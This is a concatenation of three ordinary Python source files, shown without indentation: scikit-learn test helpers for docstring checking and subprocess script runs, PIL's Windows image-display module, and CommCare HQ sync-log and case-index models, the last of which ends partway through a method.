param_signature = list(filter(lambda x: x not in ignore, _get_args(func)))
# drop self
if len(param_signature) > 0 and param_signature[0] == 'self':
param_signature.remove('self')
# Analyze function's docstring
if doc is None:
with warnings.catch_warnings(record=True) as w:
try:
doc = docscrape.FunctionDoc(func)
except Exception as exp:
incorrect += [func_name + ' parsing error: ' + str(exp)]
return incorrect
if len(w):
raise RuntimeError('Error for %s:\n%s' % (func_name, w[0]))
param_docs = []
for name, type_definition, param_doc in doc['Parameters']:
# Type hints are empty only if parameter name ended with :
if not type_definition.strip():
if ':' in name and name[:name.index(':')][-1:].strip():
incorrect += [func_name +
' There was no space between the param name and '
'colon (%r)' % name]
elif name.rstrip().endswith(':'):
incorrect += [func_name +
' Parameter %r has an empty type spec. '
'Remove the colon' % (name.lstrip())]
# Create a list of parameters to compare with the parameters gotten
# from the func signature
if '*' not in name:
param_docs.append(name.split(':')[0].strip('` '))
# If one of the docstring's parameters had an error then return that
# incorrect message
if len(incorrect) > 0:
return incorrect
# Remove the parameters that should be ignored from list
param_docs = list(filter(lambda x: x not in ignore, param_docs))
# The following is derived from pytest, Copyright (c) 2004-2017 Holger
# Krekel and others, Licensed under MIT License. See
# https://github.com/pytest-dev/pytest
message = []
for i in range(min(len(param_docs), len(param_signature))):
if param_signature[i] != param_docs[i]:
message += ["There's a parameter name mismatch in function"
" docstring w.r.t. function signature, at index %s"
" diff: %r != %r" %
(i, param_signature[i], param_docs[i])]
break
if len(param_signature) > len(param_docs):
message += ["Parameters in function docstring have less items w.r.t."
" function signature, first missing item: %s" %
param_signature[len(param_docs)]]
elif len(param_signature) < len(param_docs):
message += ["Parameters in function docstring have more items w.r.t."
" function signature, first extra item: %s" %
param_docs[len(param_signature)]]
# If there wasn't any difference in the parameters themselves between
# docstring and signature including having the same length then return
# empty list
if len(message) == 0:
return []
import difflib
import pprint
param_docs_formatted = pprint.pformat(param_docs).splitlines()
param_signature_formatted = pprint.pformat(param_signature).splitlines()
message += ["Full diff:"]
message.extend(
line.strip() for line in difflib.ndiff(param_signature_formatted,
param_docs_formatted)
)
incorrect.extend(message)
# Prepend function name
incorrect = ['In function: ' + func_name] + incorrect
return incorrect
def assert_run_python_script(source_code, timeout=60):
"""Utility to check assertions in an independent Python subprocess.
The script provided in the source code should return 0 and not print
anything on stderr or stdout.
This is a port from cloudpickle https://github.com/cloudpipe/cloudpickle
Parameters
----------
source_code : str
The Python source code to execute.
timeout : int
Time in seconds before timeout.
"""
fd, source_file = tempfile.mkstemp(suffix='_src_test_sklearn.py')
os.close(fd)
try:
with open(source_file, 'wb') as f:
f.write(source_code.encode('utf-8'))
cmd = [sys.executable, source_file]
cwd = op.normpath(op.join(op.dirname(sklearn.__file__), '..'))
env = os.environ.copy()
try:
env["PYTHONPATH"] = os.pathsep.join([cwd, env["PYTHONPATH"]])
except KeyError:
env["PYTHONPATH"] = cwd
kwargs = {
'cwd': cwd,
'stderr': STDOUT,
'env': env
}
# If coverage is running, pass the config file to the subprocess
coverage_rc = os.environ.get("COVERAGE_PROCESS_START")
if coverage_rc:
kwargs['env']['COVERAGE_PROCESS_START'] = coverage_rc
kwargs['timeout'] = timeout
try:
try:
out = check_output(cmd, **kwargs)
except CalledProcessError as e:
raise RuntimeError(u"script errored with output:\n%s"
% e.output.decode('utf-8'))
if out != b"":
raise AssertionError(out.decode('utf-8'))
except TimeoutExpired as e:
raise RuntimeError(u"script timeout, output so far:\n%s"
% e.output.decode('utf-8'))
finally:
os.unlink(source_file)
def _convert_container(container, constructor_name, columns_name=None):
if constructor_name == 'list':
return list(container)
elif constructor_name == 'tuple':
return tuple(container)
elif constructor_name == 'array':
return np.asarray(container)
elif constructor_name == 'sparse':
return sp.sparse.csr_matrix(container)
elif constructor_name == 'dataframe':
pd = pytest.importorskip('pandas')
return pd.DataFrame(container, columns=columns_name)
elif constructor_name == 'series':
pd = pytest.importorskip('pandas')
return pd.Series(container)
elif constructor_name == 'index':
pd = pytest.importorskip('pandas')
return pd.Index(container)
elif constructor_name == 'slice':
return slice(container[0], container[1])
| |
#
# The Python Imaging Library.
# $Id$
#
# a Windows DIB display interface
#
# History:
# 1996-05-20 fl Created
# 1996-09-20 fl Fixed subregion exposure
# 1997-09-21 fl Added draw primitive (for tzPrint)
# 2003-05-21 fl Added experimental Window/ImageWindow classes
# 2003-09-05 fl Added fromstring/tostring methods
#
# Copyright (c) Secret Labs AB 1997-2003.
# Copyright (c) Fredrik Lundh 1996-2003.
#
# See the README file for information on usage and redistribution.
#
from . import Image
class HDC(object):
"""
Wraps an HDC integer. The resulting object can be passed to the
:py:meth:`~PIL.ImageWin.Dib.draw` and :py:meth:`~PIL.ImageWin.Dib.expose`
methods.
"""
def __init__(self, dc):
self.dc = dc
def __int__(self):
return self.dc
class HWND(object):
"""
Wraps an HWND integer. The resulting object can be passed to the
:py:meth:`~PIL.ImageWin.Dib.draw` and :py:meth:`~PIL.ImageWin.Dib.expose`
methods, instead of a DC.
"""
def __init__(self, wnd):
self.wnd = wnd
def __int__(self):
return self.wnd
class Dib(object):
"""
A Windows bitmap with the given mode and size. The mode can be one of "1",
"L", "P", or "RGB".
If the display requires a palette, this constructor creates a suitable
palette and associates it with the image. For an "L" image, 128 greylevels
are allocated. For an "RGB" image, a 6x6x6 colour cube is used, together
with 20 greylevels.
To make sure that palettes work properly under Windows, you must call the
**palette** method upon certain events from Windows.
:param image: Either a PIL image, or a mode string. If a mode string is
used, a size must also be given. The mode can be one of "1",
"L", "P", or "RGB".
:param size: If the first argument is a mode string, this
defines the size of the image.
"""
def __init__(self, image, size=None):
if hasattr(image, "mode") and hasattr(image, "size"):
mode = image.mode
size = image.size
else:
mode = image
image = None
if mode not in ["1", "L", "P", "RGB"]:
mode = Image.getmodebase(mode)
self.image = Image.core.display(mode, size)
self.mode = mode
self.size = size
if image:
self.paste(image)
def expose(self, handle):
"""
Copy the bitmap contents to a device context.
:param handle: Device context (HDC), cast to a Python integer, or an
HDC or HWND instance. In PythonWin, you can use the
:py:meth:`CDC.GetHandleAttrib` to get a suitable handle.
"""
if isinstance(handle, HWND):
dc = self.image.getdc(handle)
try:
result = self.image.expose(dc)
finally:
self.image.releasedc(handle, dc)
else:
result = self.image.expose(handle)
return result
def draw(self, handle, dst, src=None):
"""
Same as expose, but allows you to specify where to draw the image, and
what part of it to draw.
The destination and source areas are given as 4-tuple rectangles. If
the source is omitted, the entire image is copied. If the source and
the destination have different sizes, the image is resized as
necessary.
"""
if not src:
src = (0, 0) + self.size
if isinstance(handle, HWND):
dc = self.image.getdc(handle)
try:
result = self.image.draw(dc, dst, src)
finally:
self.image.releasedc(handle, dc)
else:
result = self.image.draw(handle, dst, src)
return result
def query_palette(self, handle):
"""
Installs the palette associated with the image in the given device
context.
This method should be called upon **QUERYNEWPALETTE** and
**PALETTECHANGED** events from Windows. If this method returns a
non-zero value, one or more display palette entries were changed, and
the image should be redrawn.
:param handle: Device context (HDC), cast to a Python integer, or an
HDC or HWND instance.
:return: A true value if one or more entries were changed (this
indicates that the image should be redrawn).
"""
if isinstance(handle, HWND):
handle = self.image.getdc(handle)
try:
result = self.image.query_palette(handle)
finally:
self.image.releasedc(handle, handle)
else:
result = self.image.query_palette(handle)
return result
def paste(self, im, box=None):
"""
Paste a PIL image into the bitmap image.
:param im: A PIL image. The size must match the target region.
If the mode does not match, the image is converted to the
mode of the bitmap image.
:param box: A 4-tuple defining the left, upper, right, and
lower pixel coordinate. See :ref:`coordinate-system`. If
None is given instead of a tuple, all of the image is
assumed.
"""
im.load()
if self.mode != im.mode:
im = im.convert(self.mode)
if box:
self.image.paste(im.im, box)
else:
self.image.paste(im.im)
def frombytes(self, buffer):
"""
Load display memory contents from byte data.
:param buffer: A buffer containing display data (usually
data returned from <b>tobytes</b>)
"""
return self.image.frombytes(buffer)
def tobytes(self):
"""
Copy display memory contents to bytes object.
:return: A bytes object containing display data.
"""
return self.image.tobytes()
class Window(object):
"""Create a Window with the given title size."""
def __init__(self, title="PIL", width=None, height=None):
self.hwnd = Image.core.createwindow(
title, self.__dispatcher, width or 0, height or 0
)
def __dispatcher(self, action, *args):
return getattr(self, "ui_handle_" + action)(*args)
def ui_handle_clear(self, dc, x0, y0, x1, y1):
pass
def ui_handle_damage(self, x0, y0, x1, y1):
pass
def ui_handle_destroy(self):
pass
def ui_handle_repair(self, dc, x0, y0, x1, y1):
pass
def ui_handle_resize(self, width, height):
pass
def mainloop(self):
Image.core.eventloop()
class ImageWindow(Window):
"""Create an image window which displays the given image."""
def __init__(self, image, title="PIL"):
if not isinstance(image, Dib):
image = Dib(image)
self.image = image
width, height = image.size
Window.__init__(self, title, width=width, height=height)
def ui_handle_repair(self, dc, x0, y0, x1, y1):
self.image.draw(dc, (x0, y0, x1, y1))
| |
from collections import defaultdict, namedtuple
from copy import copy
from datetime import datetime
import json
import itertools
from couchdbkit.exceptions import ResourceConflict, ResourceNotFound
from casexml.apps.phone.exceptions import IncompatibleSyncLogType
from corehq.toggles import LEGACY_SYNC_SUPPORT
from corehq.util.global_request import get_request_domain
from corehq.util.soft_assert import soft_assert
from corehq.toggles import ENABLE_LOADTEST_USERS
from corehq.apps.domain.models import Domain
from dimagi.ext.couchdbkit import *
from django.db import models
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.mixins import UnicodeMixIn
from dimagi.utils.couch import LooselyEqualDocumentSchema
from dimagi.utils.couch.database import get_db
from casexml.apps.case import const
from casexml.apps.case.sharedmodels import CommCareCaseIndex, IndexHoldingMixIn
from casexml.apps.phone.checksum import Checksum, CaseStateHash
import logging
logger = logging.getLogger('phone.models')
class OTARestoreUser(object):
"""
This is the OTA restore user's interface that's used for OTA restore to properly
find cases and generate the user XML for both a web user and mobile user.
Note: When adding methods to this user, you'll need to ensure that it is
functional with both a CommCareUser and WebUser.
"""
def __init__(self, domain, couch_user, loadtest_factor=1):
self.domain = domain
self._loadtest_factor = loadtest_factor
self._couch_user = couch_user
@property
def user_id(self):
return self._couch_user.user_id
@property
def loadtest_factor(self):
"""
Gets the loadtest factor for a domain and user. Is always 1 unless
both the toggle is enabled for the domain, and the user has a non-zero,
non-null factor set.
"""
if ENABLE_LOADTEST_USERS.enabled(self.domain):
return self._loadtest_factor or 1
return 1
@property
def username(self):
return self._couch_user.raw_username
@property
def password(self):
return self._couch_user.password
@property
def user_session_data(self):
return self._couch_user.user_session_data
@property
def date_joined(self):
return self._couch_user.date_joined
@property
@memoized
def project(self):
return Domain.get_by_name(self.domain)
@property
def locations(self):
raise NotImplementedError()
@property
def sql_location(self):
"User's primary SQLLocation"
raise NotImplementedError()
@property
def sql_locations(self):
"SQLLocation objects of all locations the user is assigned to"
raise NotImplementedError()
def get_fixture_data_items(self):
raise NotImplementedError()
def get_groups(self):
raise NotImplementedError()
def get_commtrack_location_id(self):
raise NotImplementedError()
def get_owner_ids(self):
raise NotImplementedError()
def get_call_center_indicators(self):
raise NotImplementedError()
def get_case_sharing_groups(self):
raise NotImplementedError()
def get_fixture_last_modified(self):
raise NotImplementedError()
def get_ucr_filter_value(self, ucr_filter, ui_filter):
return ucr_filter.get_filter_value(self._couch_user, ui_filter)
def get_locations_to_sync(self):
"""
Returns a LocationSet object contianing all locations that should sync
"""
raise NotImplementedError()
class OTARestoreWebUser(OTARestoreUser):
def __init__(self, domain, couch_user, **kwargs):
from corehq.apps.users.models import WebUser
assert isinstance(couch_user, WebUser)
super(OTARestoreWebUser, self).__init__(domain, couch_user, **kwargs)
@property
def sql_location(self):
return None
@property
def sql_locations(self):
return []
@property
def locations(self):
return []
def get_fixture_data_items(self):
return []
def get_groups(self):
return []
def get_commtrack_location_id(self):
return None
def get_owner_ids(self):
return [self.user_id]
def get_call_center_indicators(self, config):
return None
def get_case_sharing_groups(self):
return []
def get_fixture_last_modified(self):
from corehq.apps.fixtures.models import UserFixtureStatus
return UserFixtureStatus.DEFAULT_LAST_MODIFIED
def get_locations_to_sync(self):
# todo: not yet implemented for web users
from corehq.apps.locations.fixtures import LocationSet
return LocationSet()
class OTARestoreCommCareUser(OTARestoreUser):
def __init__(self, domain, couch_user, **kwargs):
from corehq.apps.users.models import CommCareUser
assert isinstance(couch_user, CommCareUser)
super(OTARestoreCommCareUser, self).__init__(domain, couch_user, **kwargs)
@property
def sql_location(self):
return self._couch_user.sql_location
@property
def sql_locations(self):
return self._couch_user.sql_locations
@property
def locations(self):
return self._couch_user.locations
def add_to_assigned_locations(self, location):
return self._couch_user.add_to_assigned_locations(location)
def set_location(self, location):
return self._couch_user.set_location(location)
def get_fixture_data_items(self):
from corehq.apps.fixtures.models import FixtureDataItem
return FixtureDataItem.by_user(self._couch_user)
def get_groups(self):
# this call is only used by bihar custom code and can be removed when that project is inactive
from corehq.apps.groups.models import Group
return Group.by_user(self._couch_user)
def get_commtrack_location_id(self):
from corehq.apps.commtrack.util import get_commtrack_location_id
return get_commtrack_location_id(self._couch_user, self.project)
def get_owner_ids(self):
return self._couch_user.get_owner_ids(self.domain)
def get_call_center_indicators(self, config):
from corehq.apps.callcenter.indicator_sets import CallCenterIndicators
return CallCenterIndicators(
self.project.name,
self.project.default_timezone,
self.project.call_center_config.case_type,
self._couch_user,
indicator_config=config
)
def get_case_sharing_groups(self):
return self._couch_user.get_case_sharing_groups()
def get_fixture_last_modified(self):
from corehq.apps.fixtures.models import UserFixtureType
return self._couch_user.fixture_status(UserFixtureType.LOCATION)
@memoized
def get_locations_to_sync(self):
from corehq.apps.locations.fixtures import get_all_locations_to_sync
return get_all_locations_to_sync(self)
class CaseState(LooselyEqualDocumentSchema, IndexHoldingMixIn):
"""
Represents the state of a case on a phone.
"""
case_id = StringProperty()
type = StringProperty()
indices = SchemaListProperty(CommCareCaseIndex)
@classmethod
def from_case(cls, case):
if isinstance(case, dict):
return cls.wrap({
'case_id': case['_id'],
'type': case['type'],
'indices': case['indices'],
})
return cls(
case_id=case.case_id,
type=case.type,
indices=case.indices,
)
def __repr__(self):
return "case state: %s (%s)" % (self.case_id, self.indices)
class SyncLogAssertionError(AssertionError):
def __init__(self, case_id, *args, **kwargs):
self.case_id = case_id
super(SyncLogAssertionError, self).__init__(*args, **kwargs)
LOG_FORMAT_LEGACY = 'legacy'
LOG_FORMAT_SIMPLIFIED = 'simplified'
class AbstractSyncLog(SafeSaveDocument, UnicodeMixIn):
date = DateTimeProperty()
# domain = StringProperty()
user_id = StringProperty()
previous_log_id = StringProperty() # previous sync log, forming a chain
duration = IntegerProperty() # in seconds
log_format = StringProperty()
# owner_ids_on_phone stores the ids the phone thinks it's the owner of.
# This typically includes the user id,
# as well as all groups that that user is a member of.
owner_ids_on_phone = StringListProperty()
# for debugging / logging
previous_log_rev = StringProperty() # rev of the previous log at the time of creation
last_submitted = DateTimeProperty() # last time a submission caused this to be modified
rev_before_last_submitted = StringProperty() # rev when the last submission was saved
last_cached = DateTimeProperty() # last time this generated a cached response
hash_at_last_cached = StringProperty() # the state hash of this when it was last cached
# save state errors and hashes here
had_state_error = BooleanProperty(default=False)
error_date = DateTimeProperty()
error_hash = StringProperty()
strict = True # for asserts
@classmethod
def get(cls, doc_id):
doc = get_sync_log_doc(doc_id)
return cls.wrap(doc)
def _assert(self, conditional, msg="", case_id=None):
if not conditional:
logger.warn("assertion failed: %s" % msg)
if self.strict:
raise SyncLogAssertionError(case_id, msg)
else:
self.has_assert_errors = True
@classmethod
def wrap(cls, data):
ret = super(AbstractSyncLog, cls).wrap(data)
if hasattr(ret, 'has_assert_errors'):
ret.strict = False
return ret
def case_count(self):
"""
How many cases are associated with this. Used in reports.
"""
raise NotImplementedError()
def phone_is_holding_case(self, case_id):
raise NotImplementedError()
def get_footprint_of_cases_on_phone(self):
"""
Gets the phone's flat list of all case ids on the phone,
owned or not owned but relevant.
"""
raise NotImplementedError()
def get_state_hash(self):
return CaseStateHash(Checksum(self.get_footprint_of_cases_on_phone()).hexdigest())
def update_phone_lists(self, xform, case_list):
"""
Given a form an list of touched cases, update this sync log to reflect the updated
state on the phone.
"""
raise NotImplementedError()
def get_payload_attachment_name(self, version):
return 'restore_payload_{version}.xml'.format(version=version)
def has_cached_payload(self, version):
return self.get_payload_attachment_name(version) in self._doc.get('_attachments', {})
def get_cached_payload(self, version, stream=False):
try:
return self.fetch_attachment(self.get_payload_attachment_name(version), stream=stream)
except ResourceNotFound:
return None
def set_cached_payload(self, payload, version):
self.put_attachment(payload, name=self.get_payload_attachment_name(version),
content_type='text/xml')
def invalidate_cached_payloads(self):
for name in copy(self._doc.get('_attachments', {})):
self.delete_attachment(name)
@classmethod
def from_other_format(cls, other_sync_log):
"""
Convert to an instance of a subclass from another subclass. Subclasses can
override this to provide conversion functions.
"""
raise IncompatibleSyncLogType('Unable to convert from {} to {}'.format(
type(other_sync_log), cls,
))
# anything prefixed with 'tests_only' is only used in tests
def tests_only_get_cases_on_phone(self):
raise NotImplementedError()
def test_only_clear_cases_on_phone(self):
raise NotImplementedError()
def test_only_get_dependent_cases_on_phone(self):
raise NotImplementedError()
class SyncLog(AbstractSyncLog):
"""
A log of a single sync operation.
"""
log_format = StringProperty(default=LOG_FORMAT_LEGACY)
last_seq = StringProperty() # the last_seq of couch during this sync
# we need to store a mapping of cases to indices for generating the footprint
# cases_on_phone represents the state of all cases the server
# thinks the phone has on it and cares about.
cases_on_phone = SchemaListProperty(CaseState)
# dependant_cases_on_phone represents the possible list of cases
# also on the phone because they are referenced by a real case's index
# (or a dependent case's index).
# This list is not necessarily a perfect reflection
# of what's on the phone, but is guaranteed to be after pruning
dependent_cases_on_phone = SchemaListProperty(CaseState)
@classmethod
def wrap(cls, data):
# last_seq used to be int, but is now string for cloudant compatibility
if isinstance(data.get('last_seq'), (int, long)):
data['last_seq'] = unicode(data['last_seq'])
return super(SyncLog, cls).wrap(data)
@classmethod
def last_for_user(cls, user_id):
from casexml.apps.phone.dbaccessors.sync_logs_by_user import get_last_synclog_for_user
return get_last_synclog_for_user(user_id)
def case_count(self):
return len(self.cases_on_phone)
def get_previous_log(self):
"""
Get the previous sync log, if there was one. Otherwise returns nothing.
"""
if not hasattr(self, "_previous_log_ref"):
self._previous_log_ref = SyncLog.get(self.previous_log_id) if self.previous_log_id else None
return self._previous_log_ref
def phone_has_case(self, case_id):
"""
Whether the phone currently has a case, according to this sync log
"""
return self.get_case_state(case_id) is not None
def get_case_state(self, case_id):
"""
Get the case state object associated with an id, or None if no such
object is found
"""
filtered_list = self._case_state_map()[case_id]
if filtered_list:
self._assert(len(filtered_list) == 1,
"Should be exactly 0 or 1 cases on phone but were %s for %s" %
(len(filtered_list), case_id))
return CaseState.wrap(filtered_list[0])
return None
def phone_has_dependent_case(self, case_id):
"""
Whether the phone currently has a dependent case, according to this sync log
"""
return self.get_dependent_case_state(case_id) is not None
def get_dependent_case_state(self, case_id):
"""
Get the dependent case state object associated with an id, or None if no such
object is found
"""
filtered_list = self._dependent_case_state_map()[case_id]
if filtered_list:
self._assert(len(filtered_list) == 1,
"Should be exactly 0 or 1 dependent cases on phone but were %s for %s" %
(len(filtered_list), case_id))
return CaseState.wrap(filtered_list[0])
return None
@memoized
def _dependent_case_state_map(self):
return self._build_state_map('dependent_cases_on_phone')
@memoized
def _case_state_map(self):
return self._build_state_map('cases_on_phone')
def _build_state_map(self, list_name):
state_map = defaultdict(list)
# referencing the property via self._doc is because we don't want to needlessly call wrap
# (which couchdbkit does not make any effort to cache on repeated calls)
# deterministically this change shaved off 10 seconds from an ota restore
# of about 300 cases.
for case in self._doc[list_name]:
state_map[case['case_id']].append(case)
return state_map
def _get_case_state_from_anywhere(self, case_id):
return self.get_case_state(case_id) or self.get_dependent_case_state(case_id)
def archive_case(self, case_id):
state = self.get_case_state(case_id)
if state:
self.cases_on_phone.remove(state)
self._case_state_map.reset_cache(self)
all_indices = [i for case_state in self.cases_on_phone + self.dependent_cases_on_phone
for i in case_state.indices]
if any([i.referenced_id == case_id for i in all_indices]):
self.dependent_cases_on_phone.append(state)
self._dependent_case_state_map.reset_cache(self)
return state
else:
state = self.get_dependent_case_state(case_id)
if state:
all_indices = [i for case_state in self.cases_on_phone + self.dependent_cases_on_phone
for i in case_state.indices]
if not any([i.referenced_id == case_id for i in all_indices]):
self.dependent_cases_on_phone.remove(state)
self._dependent_case_state_map.reset_cache(self)
return state
def _phone_owns(self, action):
# whether the phone thinks it owns an action block.
# the only way this can't be true is if the block assigns to an
# owner id that's not associated with the user on the phone
owner = action.updated_known_properties.get("owner_id")
if owner:
return owner in self.owner_ids_on_phone
return True
def update_phone_lists(self, xform, case_list):
# for all the cases update the relevant lists in the sync log
# so that we can build a historical record of what's associated
# with the phone
removed_states = {}
new_indices = set()
for case in case_list:
actions = case.get_actions_for_form(xform)
for action in actions:
logger.debug('OLD {}: {}'.format(case.case_id, action.action_type))
if action.action_type == const.CASE_ACTION_CREATE:
self._assert(not self.phone_has_case(case.case_id),
'phone has case being created: %s' % case.case_id)
starter_state = CaseState(case_id=case.case_id, indices=[])
if self._phone_owns(action):
self.cases_on_phone.append(starter_state)
self._case_state_map.reset_cache(self)
else:
removed_states[case.case_id] = starter_state
elif action.action_type == const.CASE_ACTION_UPDATE:
if not self._phone_owns(action):
# only action necessary here is in the case of
# reassignment to an owner the phone doesn't own
state = self.archive_case(case.case_id)
if state:
removed_states[case.case_id] = state
elif action.action_type == const.CASE_ACTION_INDEX:
# in the case of parallel reassignment and index update
# the phone might not have the case
if self.phone_has_case(case.case_id):
case_state = self.get_case_state(case.case_id)
else:
case_state = self.get_dependent_case_state(case.case_id)
# reconcile indices
if case_state:
for index in action.indices:
new_indices.add(index.referenced_id)
case_state.update_indices(action.indices)
elif action.action_type == const.CASE_ACTION_CLOSE:
if self.phone_has_case(case.case_id):
state = self.archive_case(case.case_id)
if state:
removed_states[case.case_id] = state
# if we just removed a state and added an index to it
# we have to put it back in our dependent case list
readded_any = False
for index in new_indices:
if index in removed_states:
self.dependent_cases_on_phone.append(removed_states[index])
readded_any = True
if readded_any:
self._dependent_case_state_map.reset_cache(self)
if case_list:
try:
self.save()
self.invalidate_cached_payloads()
except ResourceConflict:
logging.exception('doc update conflict saving sync log {id}'.format(
id=self._id,
))
raise
def get_footprint_of_cases_on_phone(self):
def children(case_state):
return [self._get_case_state_from_anywhere(index.referenced_id)
for index in case_state.indices]
relevant_cases = set()
queue = list(self.cases_on_phone)
while queue:
case_state = queue.pop()
# I don't actually understand why something is coming back None
# here, but we can probably just ignore it.
if case_state is not None and case_state.case_id not in relevant_cases:
relevant_cases.add(case_state.case_id)
queue.extend(children(case_state))
return relevant_cases
def phone_is_holding_case(self, case_id):
"""
Whether the phone is holding (not purging) a case.
"""
# this is inefficient and could be optimized
if self.phone_has_case(case_id):
return True
else:
cs = self.get_dependent_case_state(case_id)
if cs and case_id in self.get_footprint_of_cases_on_phone():
return True
return False
def __unicode__(self):
return "%s synced on %s (%s)" % (self.user_id, self.date.date(), self.get_id)
def tests_only_get_cases_on_phone(self):
return self.cases_on_phone
def test_only_clear_cases_on_phone(self):
self.cases_on_phone = []
def test_only_get_dependent_cases_on_phone(self):
return self.dependent_cases_on_phone
class IndexTree(DocumentSchema):
"""
Document type representing a case dependency tree (which is flattened to a single dict)
"""
# a flat mapping of cases to dicts of their indices. The keys in each dict are the index identifiers
# and the values are the referenced case IDs
indices = SchemaDictProperty()
def __repr__(self):
return json.dumps(self.indices, indent=2)
@staticmethod
def get_all_dependencies(case_id, child_index_tree, extension_index_tree, closed_cases=None,
cached_child_map=None, cached_extension_map=None):
"""Takes a child and extension index tree and returns returns a set of all dependencies of <case_id>
Traverse each incoming index, return each touched case. Stop traversing
incoming extensions if they lead to closed cases.
Traverse each outgoing index in the extension tree, return each touched case
"""
if closed_cases is None:
closed_cases = set()
def _recursive_call(case_id, all_cases, cached_child_map, cached_extension_map):
all_cases.add(case_id)
incoming_extension_indices = extension_index_tree.get_cases_that_directly_depend_on_case(
case_id,
cached_map=cached_extension_map
)
open_incoming_extension_indices = {
case for case in incoming_extension_indices if case not in closed_cases
}
all_incoming_indices = itertools.chain(
child_index_tree.get_cases_that_directly_depend_on_case(case_id, cached_map=cached_child_map),
open_incoming_extension_indices,
)
for dependent_case in all_incoming_indices:
# incoming indices
if dependent_case not in all_cases:
all_cases.add(dependent_case)
_recursive_call(dependent_case, all_cases, cached_child_map, cached_extension_map)
for indexed_case in extension_index_tree.indices.get(case_id, {}).values():
# outgoing extension indices
if indexed_case not in all_cases:
all_cases.add(indexed_case)
_recursive_call(indexed_case, all_cases, cached_child_map, cached_extension_map)
all_cases = set()
cached_child_map = cached_child_map or _reverse_index_map(child_index_tree.indices)
cached_extension_map = cached_extension_map or _reverse_index_map(extension_index_tree.indices)
_recursive_call(case_id, all_cases, cached_child_map, cached_extension_map)
return all_cases
@staticmethod
def get_all_outgoing_cases(case_id, child_index_tree, extension_index_tree):
"""traverse all outgoing child and extension indices"""
all_cases = set([case_id])
new_cases = set([case_id])
while new_cases:
case_to_check = new_cases.pop()
parent_cases = set(child_index_tree.indices.get(case_to_check, {}).values())
host_cases = set(extension_index_tree.indices.get(case_to_check, {}).values())
new_cases = (new_cases | parent_cases | host_cases) - all_cases
all_cases = all_cases | parent_cases | host_cases
return all_cases
@staticmethod
def traverse_incoming_extensions(case_id, extension_index_tree, closed_cases, cached_map=None):
"""traverse open incoming extensions"""
all_cases = set([case_id])
new_cases = set([case_id])
cached_map = cached_map or _reverse_index_map(extension_index_tree.indices)
while new_cases:
case_to_check = new_cases.pop()
open_incoming_extension_indices = {
case for case in
extension_index_tree.get_cases_that_directly_depend_on_case(case_to_check,
cached_map=cached_map)
if case not in closed_cases
}
for incoming_case in open_incoming_extension_indices:
new_cases.add(incoming_case)
all_cases.add(incoming_case)
return all_cases
def get_cases_that_directly_depend_on_case(self, case_id, cached_map=None):
cached_map = cached_map or _reverse_index_map(self.indices)
return cached_map.get(case_id, [])
def get_all_cases_that_depend_on_case(self, case_id, cached_map=None):
"""
Recursively builds a tree of all cases that depend on this case and returns
a flat set of case ids.
Allows passing in a cached map of reverse index references if you know you are going
to call it more than once in a row to avoid rebuilding that.
"""
def _recursive_call(case_id, all_cases, cached_map):
all_cases.add(case_id)
for dependent_case in self.get_cases_that_directly_depend_on_case(case_id, cached_map=cached_map):
if dependent_case not in all_cases:
all_cases.add(dependent_case)
_recursive_call(dependent_case, all_cases, cached_map)
all_cases = set()
cached_map = cached_map or _reverse_index_map(self.indices)
_recursive_call(case_id, all_cases, cached_map)
return all_cases
def delete_index(self, from_case_id, index_name):
prior_ids = self.indices.pop(from_case_id, {})
prior_ids.pop(index_name, None)
if prior_ids:
self.indices[from_case_id] = prior_ids
def set_index(self, from_case_id, index_name, to_case_id):
prior_ids = self.indices.get(from_case_id, {})
prior_ids[index_name] = to_case_id
self.indices[from_case_id] = prior_ids
def apply_updates(self, other_tree):
"""
Apply updates from another IndexTree and return a copy with those applied.
If an id is found in the new one, use that id's indices, otherwise, use this ones,
(defaulting to nothing).
"""
assert isinstance(other_tree, IndexTree)
new = IndexTree(
indices=copy(self.indices),
)
new.indices.update(other_tree.indices)
return new
def _reverse_index_map(index_map):
reverse_indices = defaultdict(set)
for case_id, indices in index_map.items():
for indexed_case_id in indices.values():
reverse_indices[indexed_case_id].add(case_id)
return dict(reverse_indices)
class SimplifiedSyncLog(AbstractSyncLog):
"""
New, simplified sync log class that is used by ownership cleanliness restore.
Just maintains a flat list of case IDs on the phone rather than the case/dependent state
lists from the SyncLog class.
"""
log_format = StringProperty(default=LOG_FORMAT_SIMPLIFIED)
case_ids_on_phone = SetProperty(unicode)
# this is a subset of case_ids_on_phone used to flag that a case is only around because it has dependencies
# this allows us to purge it if possible from other actions
dependent_case_ids_on_phone = SetProperty(unicode)
owner_ids_on_phone = SetProperty(unicode)
index_tree = SchemaProperty(IndexTree) # index tree of subcases / children
extension_index_tree = SchemaProperty(IndexTree) # index tree of extensions
closed_cases = SetProperty(unicode)
extensions_checked = BooleanProperty(default=False)
def save(self, *args, **kwargs):
# force doc type to SyncLog to avoid changing the couch view.
self.doc_type = "SyncLog"
super(SimplifiedSyncLog, self).save(*args, **kwargs)
def case_count(self):
return len(self.case_ids_on_phone)
def phone_is_holding_case(self, case_id):
"""
Whether the phone currently has a case, according to this sync log
"""
return case_id in self.case_ids_on_phone
def get_footprint_of_cases_on_phone(self):
return list(self.case_ids_on_phone)
@property
def primary_case_ids(self):
return self.case_ids_on_phone - self.dependent_case_ids_on_phone
def purge(self, case_id):
"""
This happens in 3 phases, and recursively tries to purge outgoing indices of purged cases.
Definitions:
-----------
A case is *relevant* if:
- it is open and owned or,
- it has a relevant child or,
- it has a relevant extension or,
- it is the extension of a relevant case.
A case is *available* if:
- it is open and not an extension case or,
- it is open and is the extension of an available case.
A case is *live* if:
- it is owned and available or,
- it has a live child or,
- it has a live extension or,
- it is the exension of a live case.
Algorithm:
----------
1. Mark *relevant* cases
Mark all open cases owned by the user relevant. Traversing all outgoing child
and extension indexes, as well as all incoming extension indexes, mark all
touched cases relevant.
2. Mark *available* cases
Mark all relevant cases that are open and have no outgoing extension indexes
as available. Traverse incoming extension indexes which don't lead to closed
cases, mark all touched cases as available.
3. Mark *live* cases
Mark all relevant, owned, available cases as live. Traverse incoming
extension indexes which don't lead to closed cases, mark all touched
cases as live.
"""
logger.debug("purging: {}".format(case_id))
self.dependent_case_ids_on_phone.add(case_id)
relevant = self._get_relevant_cases(case_id)
available = self._get_available_cases(relevant)
live = self._get_live_cases(available)
to_remove = relevant - live
self._remove_cases_purge_indices(to_remove, case_id)
def _get_relevant_cases(self, case_id):
"""
Mark all open cases owned by the user relevant. Traversing all outgoing child
and extension indexes, as well as all incoming extension indexes,
mark all touched cases relevant.
"""
